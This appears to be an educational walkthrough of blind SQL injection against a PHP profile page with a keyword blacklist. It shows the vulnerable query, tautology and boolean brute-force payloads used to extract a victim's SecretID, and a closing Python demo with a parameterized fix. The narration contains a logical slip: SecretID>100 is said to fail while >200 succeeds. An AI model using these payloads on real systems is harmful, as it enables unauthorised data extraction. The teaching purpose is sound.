
Attack C: SQL Injection

In this case, we want to know how to retrieve an attribute that only exists in the database. Suppose we use the user.php from Attack A for querying a user profile. The task is to find the SecretID of a user, which is generated every time a user registers. For this exercise we are told that the SecretID is between 1 and 999.

1. Study the input form

Now, most hackers would not have the source code and would have to tamper with the input form, guessing which characters are filtered out. But for the sake of simplicity, here is the source code of the View User function:

$selecteduser = $_GET['user'];
// Blacklist of SQLite reserved words; any match rejects the whole input.
$forbiddenSQL = 'ABORT|ACTION|AFTER|ALTER|ANALYZE|ATTACH|AUTOINCREMENT|
                  BEGIN|CASCADE|CASE|CAST|CHECK|COLLATE|COLUMN|COMMIT|
                  CONFLICT|CONSTRAINT|CREATE|CROSS|CURRENT_DATE|
                  CURRENT_TIME|CURRENT_TIMESTAMP|DATABASE|DEFAULT|
                  DEFERRABLE|DEFERRED|DELETE|DETACH|DISTINCT|DROP|EACH|
                  ESCAPE|EXCEPT|EXCLUSIVE|EXISTS|EXPLAIN|FAIL|FOREIGN|
                  FROM|FULL|GLOB|GROUP|HAVING|IGNORE|IMMEDIATE|INDEX|
                  INDEXED|INITIALLY|INNER|INSERT|INSTEAD|INTERSECT|
                  INTO|ISNULL|JOIN|KEY|LEFT|LIKE|LIMIT|MATCH|NATURAL|
                  NOTNULL|NULL|OUTER|PLAN|PRAGMA|PRIMARY|QUERY|RAISE|
                  REFERENCES|REGEXP|REINDEX|RELEASE|RENAME|REPLACE|
                  RESTRICT|RIGHT|ROLLBACK|ROW|SAVEPOINT|SELECT|SET|TABLE|
                  TEMP|TEMPORARY|THEN|TRANSACTION|TRIGGER|UNION|UNIQUE|
                  UPDATE|USING|VACUUM|VALUES|VIEW|VIRTUAL|WHEN';
// Case-insensitive search for any blacklisted word anywhere in the input.
if (!preg_match("/$forbiddenSQL/i", $selecteduser))
{
   // The input is concatenated straight into the query: this is the injection point.
   $sql = "SELECT Profile, Username, Peanuts FROM Person " .
          "WHERE Username='$selecteduser'";
   $rs = $db->executeQuery($sql);
   // ... (rest of the function elided in the original)
}

This is the part of the source code that sanitizes the user input. The preg_match call rejects any input containing one of the reserved words in the $forbiddenSQL variable. What do we conclude from this? It seems the programmer forgot to filter out quotes, spaces, AND, and semicolons, which will be advantageous in our SQL injection scheme.

2. Study the Query

Once you know what can and cannot be typed into the input form, your next task is to study the query. Take another look at it:

$sql = "SELECT Profile, Username, Peanuts FROM Person " .
           "WHERE Username='$selecteduser'";

We can tamper with the Username using ' AND '1'='1 just to get a random user, because the query is translated into:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='' AND '1'='1'

The appended condition '1'='1' evaluates to true for every row inspected.

3. Brute Force your way out

Now, how do we get the SecretID of a particular user? It is a little hard, since you can't use UNION (it is on the blacklist) to merge in the table with the SecretID column. Our last option is brute force. Thank God the SecretID is between 1 and 999, so our brute force is not too complicated. Now set up your first guess: maybe the SecretID is above 100:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID>100

The form returns a not-found notice. Now let's try 200 as our lower bound:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID>200

The form returns the victim's profile. Now we know the SecretID is above 200. Next, set the upper bound to 300 to narrow the search:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID>200 AND SecretID<300

The page again returns the victim's profile. Now you just have to lower the upper bound until you have pinned down the victim's SecretID, which is:

SELECT Profile, Username, Peanuts FROM Person WHERE Username='victim' 
   AND SecretID=201
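To show why the keyword blacklist from step 1 does not stop the step-3 probe, and what the fix looks like, here is an added example that is not part of the original post or of user.php. It rebuilds the filter and the Person table in an in-memory SQLite database (the table layout, the "brown" user and the profile values are constructed for the demo) and runs the page's probe against the concatenated query and against a parameterized one.

```python
import re
import sqlite3

# Subset of the SQLite keyword blacklist in user.php; the page's full list
# behaves the same for the inputs used here.
FORBIDDEN_SQL = re.compile(
    r"ALTER|CREATE|DELETE|DROP|FROM|INSERT|LIKE|LIMIT|NULL|ROW|SELECT|"
    r"TABLE|UNION|UPDATE", re.I)

def build_db():
    """Constructed in-memory Person table standing in for the app's DB."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Person (Profile TEXT, Username TEXT, "
               "Peanuts INTEGER, SecretID INTEGER)")
    db.executemany("INSERT INTO Person VALUES (?, ?, ?, ?)", [
        ("victim profile", "victim", 5, 201),  # SecretID as found on the page
        ("brown profile", "brown", 7, 333),    # constructed, legitimate user
    ])
    return db

def view_user_blacklist(db, selected_user):
    """Mirrors user.php: reject blacklisted keywords, then concatenate."""
    if FORBIDDEN_SQL.search(selected_user):
        return "rejected"
    sql = ("SELECT Profile, Username, Peanuts FROM Person "
           f"WHERE Username='{selected_user}'")
    return db.execute(sql).fetchall()

def view_user_parameterized(db, selected_user):
    """Hardened form: the value is bound as data, never parsed as SQL."""
    sql = "SELECT Profile, Username, Peanuts FROM Person WHERE Username=?"
    return db.execute(sql, (selected_user,)).fetchall()

def demo():
    """Step-3 probe from the page, quote-balanced with the step-2 '1'='1'."""
    db = build_db()
    probe = "victim' AND SecretID>200 AND '1'='1"
    return {
        # AND, quotes, spaces and > are not on the list, so the probe passes.
        "probe_passes_filter": FORBIDDEN_SQL.search(probe) is None,
        # Row presence leaks whether SecretID>200 holds (the page's oracle).
        "blacklist": view_user_blacklist(db, probe),
        # Bound parameter: the literal string is simply not a username.
        "parameterized": view_user_parameterized(db, probe),
        # False positive: "brown" contains ROW, so the blacklist rejects it.
        "brown_blacklist": view_user_blacklist(db, "brown"),
        "brown_parameterized": view_user_parameterized(db, "brown"),
    }
```

The parameterized query neutralizes the probe without any keyword list, and it also stops rejecting legitimate usernames such as "brown" that happen to contain a reserved word.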